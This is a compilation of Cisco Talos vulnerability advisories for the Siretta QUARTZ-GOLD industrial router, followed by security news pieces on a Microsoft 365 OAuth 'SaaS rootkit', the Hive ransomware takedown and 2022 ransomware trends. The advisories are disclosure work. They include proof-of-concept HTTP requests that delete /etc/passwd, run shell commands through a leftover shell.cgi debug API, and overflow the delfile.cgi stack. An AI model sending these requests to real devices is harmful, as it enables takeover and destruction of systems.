A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

6.5 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

    void delfile.cgi(void)
    
    {
      [...]
    
      [... calculate the value of the base_folder variable ...]
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename_ = "";
      if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
      }
      if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
        system(command_buff);                                                                                       [3]
      }
      [...]
    }
    

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and then used at [2]. From the fetch of the _filename parameter, at [1], to its usage at [2] there is no sanitization of the parameter. Then at [3] the string rm -rf <base_folder>/<_filename> is used as parameter of the system function. This functionality is vulnerable to a path traversal, allowing the deletion of arbitrary files in the file-system.

**Exploit Proof of Concept**

For example, sending the following request:

    POST /delfile.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth value>
    Content-Length: 55
    
    _filename=../../etc/passwd&_http_id=<the correct tid>
    

would prohibit access with SSH.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-40701: TALOS-2022-1606 || Cisco Talos Intelligence Group

Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_INFO command.

**SUMMARY**

Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD offers a feature called M2M. When enabled, the device will execute the m2m binary and offer different network services. One of the services the m2m binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.

Several commands use the m2m_parse_router_config function:

    uint m2m_parse_router_config(char *data,uint data_len)
    
    {
      [...]
    
      memset(nvram_command,0,0x800);
      memset(param,0,0x400);
      syslog(5,"----parse_router_config %d:%s----",data_len,data);
      syslog(5,"----NVRAM Set Command Start----");
      len_first_no_& = strspn(data,"&");
      strncpy(param,data + len_first_no_&,0x400);
      first_& = strcspn(param,"&" );
      param[first_&] = '\0';
      local_19 = 0;
      pcVar1 = strchr(data + len_first_no_&,L'&');
      while (param[0] != '\0') {
        memset(nvram_command,0,0x800);
        sprintf(nvram_command,"nvram set %s",param);                                                                [1]
        syslog(5,"%s",nvram_command);
        system(nvram_command);                                                                                      [2]
        [...]
    

This function will parse data in the UDP packet received. The command expects a list that looks like: <nvram_key_1>=<nvram_value_1>&<nvram_key_2>=<nvram_value_2>..... Then, for each key value pair, it will compose at [1] the nvram set <nvram_key>=<nvram_value>. The composed string will be used as argument for the system function at [2]. The problem is that from receiving the command packet to [2] the data is never sanitized. This allows any string to be used as argument of the system call. This can lead to an OS command injection.

Following is the list of the vulnerable commands that will call the m2m_parse_router_config function.

**CVE-2022-42490 - DOWNLOAD\_CFG\_FILE command injection**

Following is the portion of m2m binary that manages the DOWNLOAD_CFG_FILE command:

    syslog(5,"M2M Command(%02x) DOWNLOAD_CFG_FILE!!!",0x16);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len;
    syslog(5,"DOWNLOAD_CFG_FILE %d:%s",
            data_len),
            &UDP_data_buff.data);
    temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);
    [...] 
    

The command will call the m2m_parse_router_config function with the provided UDP_data_buff.data, which is an array of characters, and UDP_data_buff.data_len, its length. This will lead to a command injection vulnerability.

**CVE-2022-42491 - M2M\_CONFIG\_SET command injection**

Following is the portion of m2m binary that manages the M2M_CONFIG_SET command:

    syslog(5,"M2M Command(%02x) M2M_CONFIG_SET!!!",6);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len;
    syslog(5,"M2M_CONIFG_SET %d:%s",
           data_len,
           &UDP_data_buff.data);
    global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data,data_len);
    [...]
    

The command will call the m2m_parse_router_config function with the provided UDP_data_buff.data, which is an array of characters, and UDP_data_buff.data_len, its length. This will lead to a command injection vulnerability.

**CVE-2022-42492 - DOWNLOAD\_AD command injection**

Following is the portion of m2m binary that manages the DOWNLOAD_AD command:

    syslog(5,"M2M Command(%02x) DOWNLOAD_AD!!!",0xe);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len;
    syslog(5,"M2M_CONIFG_SET %d:%s",
           data_len,
           &UDP_data_buff.data);
    if (DOWNLOAD_THREAD_STARTED == 0) {
      global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data,data_len);
    [...]
    

The command will call the m2m_parse_router_config function with the provided UDP_data_buff.data, which is an array of characters, and UDP_data_buff.data_len, its length. This will lead to a command injection vulnerability.

**CVE-2022-42493 - DOWNLOAD\_INFO command injection**

Following is the portion of m2m binary that manages the DOWNLOAD_INFO command:

    syslog(5,"M2M Command(%02x) DOWNLOAD_INFO!!!",0xc);
    [...]
    data_len = __bswap_16(UDP_data_buff.data_len;
    syslog(5,"M2M_CONIFG_SET %d:%s",
         data_len,
         &UDP_data_buff.data);
    nvram_unset("type");
    temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);
    [...]
    

The command will call the m2m_parse_router_config function with the provided UDP_data_buff.data, which is an array of characters, and UDP_data_buff.data_len, its length. This will lead to a command injection vulnerability.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-42493: TALOS-2022-1640 || Cisco Talos Intelligence Group

A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-489 - Leftover Debug Code

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

Based on the web page shown, functionalities and the documentation publicly available, the QUARTZ-GOLD does not provide any way to directly access the linux system that runs on the router. The router’s web server is based on AdvancedTomato, which offers several debug APIs active by default. The developer, allegedly, forgot to disable those debug APIs. For instance, the AdvancedTomato’s shell.cgi API is still active, allowing arbitrary command execution:

    static void wo_shell(char *url)
    {
        web_puts("\ncmdresult = '");
        _execute_command(NULL, webcgi_get("command"), NULL, WOF_JAVASCRIPT);
        web_puts("';");
    }
    

wo_shell is the function that is called when the shell.cgi API is requested. This function will call the _execute_command with the request’s command parameter. This function will effectively execute the provided shell command. The leftover debug code allows arbitrary command execution.

**Exploit Proof of Concept**

Sending a request like the following:

    POST /shell.cgi HTTP/1.1
    Authorization: Basic <a valid basic auth>
    Content-Length: 52
    
    command=cat /etc/passwd&_http_id=<the correct tid>
    

Will generate the following response:

    HTTP/1.0 200 OK
    Date: Sat, 01 Jan 2000 22:01:30 GMT
    Content-Type: text/javascript
    Cache-Control: no-cache, no-store, must-revalidate, private
    Expires: Thu, 31 Dec 1970 00:00:00 GMT
    Pragma: no-cache
    Connection: close
    
    
    cmdresult = 'root:x:0:0:root:/root:/bin/sh\x0aadmin:x:0:0:admin:/root:/bin/sh\x0anobody:x:65534:65534:nobody:/dev/null:/dev/null\x0a';
    

The request will make the router execute the command cat /etc/passwd and respond to the HTTP request with the output of the command back.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-38715: TALOS-2022-1610 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

**PRODUCT URLS**

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has an web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

Following the API to delete a previously uploaded file:

    void delfile.cgi(void)
    
    {
      [...]
    
      [... calculate the value of the base_folder variable ...]
      _filename_param = (char *)webcgi_safeget("_filename");                                                        [1]
      filename_ = "";
      if (_filename_param != (char *)0x0) {
        filename_ = _filename_param;
      }
      if (*filename_ != '\0') {
        sprintf(command_buff,"rm -rf %s/%s",base_folder,filename_);                                                 [2]
        system(command_buff);
      }
      [...]
    }
    

The delfile.cgi expects one parameter called _filename that represents the filename of the desired file to be deleted. At [1] the uploaded parameter is taken and used at [2]. The function used at [2] is a sprintf, which does not take into consideration the size of the buffer. If the file name, provided through the _filename parameter, is longer than a certain length, the instruction at [2] would cause a stack-based buffer overflow that could lead to remote code execution.

**Crash Information**

    $r0  : 0x1       
    $r1  : 0x1       
    $r2  : 0x0       
    $r3  : 0x0       
    $r4  : 0x61616266 ("fbaa"?)
    $r5  : 0x61616366 ("fcaa"?)
    $r6  : 0x243     
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e66e  →  "delfile.cgi"
    $r10 : 0x0001dbdc  →  0x0001e66e  →  "delfile.cgi"
    $r11 : 0x7ea5b784  →  "admin"
    $r12 : 0x2ae4773c  →  0x2ae33ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ea59070  →  "feaaffaafgaafhaafiaafjaaf"
    $lr  : 0x2ae2db30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x61616464 ("ddaa"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ──── stack ────
    0x7ea59070│+0x0000: "feaaffaafgaafhaafiaafjaaf"  ← $sp
    0x7ea59074│+0x0004: "ffaafgaafhaafiaafjaaf"
    0x7ea59078│+0x0008: "fgaafhaafiaafjaaf"
    0x7ea5907c│+0x000c: "fhaafiaafjaaf"
    0x7ea59080│+0x0010: "fiaafjaaf"
    0x7ea59084│+0x0014: "fjaaf"
    0x7ea59088│+0x0018: 0x312f0066 ("f"?)
    0x7ea5908c│+0x001c: ".1\r\n"
    ──── code:arm:ARM ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x61616464
    ──── threads ────
    [#0] Id 1, Name: "httpd", stopped 0x61616464 in ?? (), reason: SIGSEGV
    

**Exploit Proof of Concept**

Sending a request like the following:

    POST /delfile.cgi HTTP/1.1
    Host: 192.168.0.1
    Authorization: Basic <a valid basic auth value>
    Connection: close
    Content-Length: 579
    
    _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaaf&_http_id=<the correct tid>
    

The status at the return address of the delfile.cgi function would be:

    $r0  : 0x1       
    $r1  : 0x1       
    $r2  : 0x0       
    $r3  : 0x0       
    $r4  : 0x00019369  →  0x6e6f4300
    $r5  : 0x0002272b  →  "/jffs"
    $r6  : 0x243     
    $r7  : 0x1       
    $r8  : 0x0       
    $r9  : 0x0001e66e  →  "delfile.cgi"
    $r10 : 0x0001dbdc  →  0x0001e66e  →  "delfile.cgi"
    $r11 : 0x7ea5b784  →  "admin"
    $r12 : 0x2ae4773c  →  0x2ae33ac4  →  <_pthread_cleanup_pop_restore+0> push {r3,  lr}
    $sp  : 0x7ea59064  →  "fbaafcaafdaafeaaffaafgaafhaafiaafjaaf"
    $lr  : 0x2ae2db30  →  <free+492> pop {r0,  r1,  r2,  r3,  r4,  r5,  r6,  pc}
    $pc  : 0x0000fa48  →   pop {r4,  r5,  pc}
    $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x7ea59064│+0x0000: "fbaafcaafdaafeaaffaafgaafhaafiaafjaaf"      ← $sp
    0x7ea59068│+0x0004: "fcaafdaafeaaffaafgaafhaafiaafjaaf"
    0x7ea5906c│+0x0008: "fdaafeaaffaafgaafhaafiaafjaaf"
    0x7ea59070│+0x000c: "feaaffaafgaafhaafiaafjaaf"
    0x7ea59074│+0x0010: "ffaafgaafhaafiaafjaaf"
    0x7ea59078│+0x0014: "fgaafhaafiaafjaaf"
    0x7ea5907c│+0x0018: "fhaafiaafjaaf"
    0x7ea59080│+0x001c: "fiaafjaaf"
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:ARM ────
           0xfa3c                  mov    r0,  r4
           0xfa40                  bl     0xbae4
           0xfa44                  add    sp,  sp,  #516    ; 0x204
     →     0xfa48                  pop    {r4,  r5,  pc}
    [!] Cannot disassemble from $PC
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
    [#0] Id 1, Name: "httpd", stopped 0xfa48 in ?? (), reason: BREAKPOINT
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
    [#0] 0xfa48 → pop {r4,  r5,  pc}
    [#1] 0x2ae2db30 → free()
    

So the next instruction will populate the pc with the third dword contained in the stack, so:

    gef➤  hexdump dword $sp
    0x7ea59064│+0x0000   0x61616266   
    0x7ea59068│+0x0004   0x61616366   
    0x7ea5906c│+0x0008   0x61616466   
    

After the pop the pc will contain the 0x61616466 value.

**TIMELINE**

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-36279: TALOS-2022-1605 || Cisco Talos Intelligence Group

Improper input validation in driver adgnetworkwfpdrv.sys in Adguard For Windows x86 up to version 7.11 allows attacker to gain local privileges escalation.

CVE-2022-45770: Versions history | AdGuard

A vulnerability within Microsoft's OAuth application registration allows an attacker to create hidden forwarding rules that act as a malicious SaaS rootkit.

Microsoft is a primary target for threat actors, who scour Microsoft applications for weaknesses. Our security research team at Adaptive Shield recently discovered a new attack vector caused by a vulnerability within Microsoft's OAuth application registration that allows attackers to leverage Exchange's legacy API to create hidden forwarding rules in Microsoft 365 mailboxes.

To understand this new attack vector, you must understand the key components therein. These include hidden forwarding rules and SaaS-to-SaaS app access, all of which amount to a malicious SaaS rootkit that can infiltrate users' accounts and control their mailboxes — without the users' knowledge.

Learn more about the top use cases to secure your entire SaaS stack.

**Hidden Forwarding Rules**

Inbox rules are actions that occur based on preset conditions within a Microsoft mailbox. Users or admins can use forwarding rules to trigger protocols based on different attributes of the user's inbox.

Hidden forwarding rules (Figure 1) were first discovered by Compass Security's Damian Pflammater in 2018. He covered the discovery and Microsoft’s response in a blog post titled "Hidden Inbox Rules in Microsoft Exchange." These rules are fully functional and can be seen on the back end. However, they are not visible common interfaces such as email clients, an admin dashboard, or an API (Figure 2).

    

Figure 1. Hidden forwarding rules are visible on the back end.

    

Figure 2. Forwarding rules don’t appear in searches through common interfaces.

**SaaS-to-SaaS Access Through OAuth 2.0**

SaaS-to-SaaS app access, also referred to as third-party app access, describes the conditions under which one app can connect to another app and, in doing so, gain access and permission to different information and settings. The OAuth 2.0 mechanism simplifies the process of authentication and authorization between consumers and service providers through a seamless process that allows users to quickly verify their identities and grant permissions to the app. The app is then allowed to execute code and perform logic within its environment behind the scenes.

In many instances, these apps are completely harmless and often serve as a valuable business tool. In other instances, these apps can act as malware, similar to an executable file.

    

Figure 3. Connecting third-party apps.

**The Next Evolution: An Attack Method Through SaaS**

With this SaaS rootkit, threat actors can create malware that lives as a SaaS app and can infiltrate and maintain access to a user's account while going unnoticed.

While bad actors can't find Exchange Legacy scopes that can used to add programmatically online hidden forwarding in the Microsoft UI, they can add them through a terminal script.

The attacker's job is simple: Create an app that looks credible, add the legacy scope protocols removed from the UI to the app (exploiting the vulnerability that the Adaptive Shield team uncovered), and send an offer to users to connect to it. The user will see an OAuth app dialogue box on the official Microsoft site, and many will likely accept it (Figure 4).

    

Figure 4. This screen shows a fake app permissions request.

Once a user accepts, the bad actor receives a token that grants permission to create forwarding rules and hides them from the user interface like a rootkit.

An attack through these hidden forwarding rules should not be mistaken for a one-off attack but, rather, the start of a new attack method through SaaS apps.

**Microsoft Response**

In 2022, Adaptive Shield contacted Microsoft about the issue, Microsoft in response said that the issue has been flagged for future review by the product team as an opportunity to improve the security of the affected product.

**How to Best Mitigate a SaaS Rootkit Attack**

There's no bulletproof way to eliminate SaaS rootkit attacks but there are a few best practices that can help keep organizations more protected.

*   **Monitor third-party app access** and their permissions to ensure that apps are legitimate and given only the access they require.
*   **Track activities** and be on the lookout for new inbox rules to identify any new connections from untrusted domains.
*   **Disable third-party app registrations** where possible to reduce risk.

**Conclusion**

Hidden forwarding rules are still a threat, even more so when they appear through the trusted Microsoft website. The traditional controls that were created to stop malware have struggled to keep up with the evolution of malware and the new attack vector that can exploit any SaaS app, from M365 to Salesforce to G-Workspace, etc. Organizations should utilize native security configurations to control the OAuth application installations across SaaS apps to protect users from malicious attacks like these.

Get Forrester's SSPM Report, "Embrace aParadigm Shift In SaaS Protection: SaaS Security Posture Management."

**About the Author**

    

A former cybersecurity intelligence officer in the IDF, Maor Bin has over 16 years in cybersecurity leadership. In his career, he led SaaS Threat Detection Research at Proofpoint and won the operational excellence award during his IDI service. Maor got his B.Sc. in computer science and is CEO and co-founder of Adaptive Shield.

SaaS RootKit Exploits Hidden Rules in Microsoft 365

The US Department of Justice hacked into Hive's infrastructure, made off with hundreds of decryptors, and seized the gang's operations.

The Feds have disrupted the prolific Hive ransomware gang, saving victims from a collective $130 million in ransom demands. But it remains to be seen how much of a blow the effort will be to the overall ransomware landscape.

The group's operations have been buzzing with activity for months, racking up more than 1,500 victims in 80-plus countries around the world since it appeared in June 2021, according to an announcement from the US Justice Department. The gang has been operating with a ransomware-as-a-service (RaaS) model, engaging in data theft and double extortion, and delivering its venom indiscriminately to school districts, financial firms, critical infrastructure, and others. At least one affiliate has become a bit of a hospital specialist, disrupting patient care in some attacks.

In what officials called "a 21st-Century cyber-stakeout," the FBI has been infiltrating the gang's network infrastructure since last July and, perhaps most notably, has now seized its decryption keys.

"The FBI has provided over 300 decryption keys to Hive victims who were under attack," according to Thursday's announcement. "In addition, the FBI distributed over 1,000 additional decryption keys to previous Hive victims."

**Hive: Gone for Good?**

Aside from swiping the decryptors, the DoJ also worked with German law enforcement to execute a coordinated seizure of the group's command-and-control (C2) infrastructure (including two servers located in Los Angeles) and the group's Dark Web leak site, US Attorney General Merrick Garland said during a press conference.

The actions could have a significant effect on the volume of ransomware attacks, at least in the short term. According to Mandiant, Hive was the most prolific ransomware family that it dealt with in its incident response engagements, accounting for more than 15% of the ransomware intrusions that it responded to.

That said, while the strike will certainly be a blow to the gang, it's unlikely that its affiliates and members will be dormant for long. As with other high-profile takedowns such as those of Conti and REvil, it's likely that they will simply join other teams or regroup to sting another day.

"We've seen multiple actors using Hive ransomware since it emerged, but the most prolific actor over the past year, based on our visibility, was UNC2727," Kimberly Goody, senior manager at Mandiant Intelligence — Google Cloud, said in an email statement. "Hive also hasn't been the only ransomware in their toolkit; in the past we've seen them employ Conti and MountLocker, among others. This shows that some actors already have relationships within the broad ecosystem that could enable them to easily shift to using another brand as part of their operations."

**Ransomware Is Becoming Less Attractive**

Still, the ransomware game is getting tougher for operators, who are facing declining profit margins, lower valuations for cryptocurrency, intense law enforcement scrutiny, more victims having appropriate backups in place, and increasing refusals from targets to pay up. As such, researchers have seen an emerging trend of ransomware actors pursuing other avenues to make money.

Crane Hassold, former FBI cyber psychological operations analyst and head of research at Abnormal Security, said via email that this latest event is likely to add fuel to that phenomenon.

"It's very possible that we'll start to see ransomware actors pivot to other types of cyberattacks, like business email compromise (BEC)," he said. "BEC is the most financially impactful cyberthreat today and, instead of using their initial access malware to gain a foothold on a company's network, they could simply reconfigure the malware to establish access to employee mailboxes, which could lead to more scaled and sophisticated vendor email compromise attacks."

Hive Ransomware Gang Loses Its Honeycomb, Thanks to DoJ

The rapid maturation and rebranding of ransomware groups calls for relentless preparation and flexibility in response, according to one view from the trenches.

Analysis of ransomware trends in 2022 shows that business was booming last year for extortionary cybercriminals, with the highest volume of ransomware attacks lobbed by sophisticated criminals that organize into groups that utilize very consistent tactics, techniques, and procedures (TTPs) amongst themselves, even if these organizations "retire" and then come back, rebranded.

A Jan. 26 report from the GuidePoint Research and Intelligence Team (GRIT) showed that while at least one new ransomware group emerged every month last year, the majority of attacks were perpetrated by a relatively small group of entrenched players.

The "GRIT 2022 Ransomware Report" examined data and circumstances from 2,507 publicly posted ransomware victims across 40 industry verticals that were carried out by 54 active threat groups.

"The thing that we really wanted to emphasize was that ransomware is not going anywhere," says Drew Schmitt, GRIT lead analyst and an experienced ransomware negotiator for GuidePoint Security. "It's very present. A lot of people seem to think that ransomware is potentially declining, because of things like Bitcoin payments are becoming less valuable. But ransomware is still happening at crazy rates."

    

Source: GRIT 2022 Ransomware Report, GuidePoint Security

As a negotiator, Schmitt works with actively attacked companies to act on their behalf and interface with the extortionist. There are two goals: to either gain enough information and time to help their security operations centers (SOCs) recover, or to negotiate a lower payment.

Using his inside knowledge about how attackers operate, and the data freely available about victimology last year, he and his team were able to put together a number of insights for the report. Dark Reading caught up with Schmitt to not only dig into details the report, but also to glean observations from his ongoing work as a negotiator. He provided seven key points that defenders should keep in mind as they prepare for more ransomware campaigns in 2023.

**1\. There's a Definite Taxonomy to Ransomware Gangs**

A big part of the analysis revolved around the development of a ransomware taxonomy for categorizing ransomware groups, which the team organized into four buckets: full-time, rebrands, splinter, and ephemeral. 

The majority of attacks came from what the taxonomy dubbed full-time groups, which have been active for nine or more months and publicly claim 10 or more victims.

"These are the Lockbits of the world, and they're the ones that are doing very consistent operations \[and\] can maintain a very high tempo," Schmitt says. "They are very consistent in behaviors and have a lot of really robust infrastructure. Those are the ones that have been operating for a very long period of time, and they're doing it consistently."

As the report pointed out, Lockbit alone accounted for 33% of attacks last year.

Then there are the rebrand groups, which have been active for less than nine months but claim nearly the same number of victims as full-time groups, and with some examination of TTPs usually have some correlation with a retired group.

"Really the only difference between the rebrand and the fulltime is the duration of operation," Schmitt says. "Groups like Royal also fit into this type of category where they just have very robust operations and they're able to operate at a high tempo."

Meantime, "splinter" groups are those that have some TTP overlap with known groups, but are less consistent in their behaviors.

"The splinter groups are an offshoot from either a rebrand or a full-time, where it's maybe somebody going off and doing their own thing," he says. "They haven't been around for very long. Their identity is not solidified at this point in time, and they're really just trying to find themselves and how they're going to operate."

Finally rounding things out are "ephemeral" groups that have been active for less than two months, which have varied but low victim rates. Sometimes these groups come and go, while other times they end up developing into more mature groups.

**2\. Rapid Rebranding of Ransomware Groups Makes Threat Intelligence Key**

The classification into those four taxonomy groups looks cleaner in an annual report than it does on the ground when a SOC starts lighting up.

"When you start dealing with these types of groups that are popping up and going away very quickly, or they're rebranding, they're developing new names, it does make it very much more difficult for the blue teamers or the defenders to keep up with these types of trends," says Schmitt, who explains that keeping tabs on rebranding and splintering of groups is where threat intelligence should come into play.

"We really like to focus on emphasizing communication when it comes to threat intelligence — whether it's threat intelligence talking with the SOC or the incident response team, or even vulnerability management," he says. "Getting an idea of what these trends look like, what the threat actors are focusing on, how much they pop up and go away, all of that is very valuable for the defenders to know."

**3\. RaaS Groups Are a Wild Card in Negotiations**

Even though the underlying TTPs of fulltime groups makes a lot of ransomware detection and response a little easier, there are still some big variables out there. For example, as many groups have employed the ransomware-as-a-service (RaaS) model, they employ a lot more affiliates, which means negotiators are always dealing with different people.

"In the early days of ransomware, when you started negotiations, there was a good chance you were dealing with the same person if you were dealing with the same ransomware," Schmitt says. "But in today's ecosystem, there are just so many different groups, and so many different affiliates that are participating as part of these groups, that a lot of times you're almost starting from scratch."

**4\. Ransom Demands Are Climbing Sky High**

One of the anecdotal observations Schmitt made was the fact that he's seen a lot of very high initial ransom demands from ransomware operators lately.

"We've seen $15 million, we've seen $13 million, we had $12.5 million. There's a lot of very high initial ransom demands that have been happening, which is a little bit surprising," he says. "And a lot of times we do successfully negotiate significantly lower ransoms. So starting at $15 million and getting down to $500,000 is not uncommon. But at the same time there are just certain threat actors that are like, 'You know what? This is my price and I don't care what you say, I'm not going to negotiate.'"

**5\. Improved Backup Strategies Are Making a Difference in Preparation**

The ratio of clients he sees who can successfully recover without caving to the extortion demands versus those that need to pay a ransom is coming close to a 1:1 parity, Schmitt says.

"In the early days it was like, 'Well crap, we got encrypted. We can't recover unless we pay this ransom,'" he notes. "As time has gone on, having really effective backup strategies has been huge for being able to recover; there are a lot of organizations that get hit with ransomware and they're able to recover simply because they have a really solid backup strategy in place."

**6\. Double Extortion Is the Norm**

However, there are still plenty of organizations that are still behind the curve, he says, which keep ransomware more profitable than ever. Additionally, the bad guys are also adjusting through doubleextortion, not only encrypting files, but stealing and threatening to publicly leak sensitive information as well. All of the groups tracked in the report utilize double extortion.

"It's a little bit unclear whether that's just because people are getting better at securitynor the groups are really realizing that maybe it's not worth the effort to deploy the ransomware if the client already has a backup strategy in place that's going to allow them to recover," he says. "So, they've been focusing on that data exfiltration because I think they know that that's the best chance that they actually have to make money off of an attack."

**7\. There's No Honor Among Thieves, but There's Business Sense**

Finally, the big question in dealing with criminal extortionists is whether the bad guys are even going to keep their word once the money drops in their account. As a negotiator, Schmitt says that, for the most part, they typically do so.

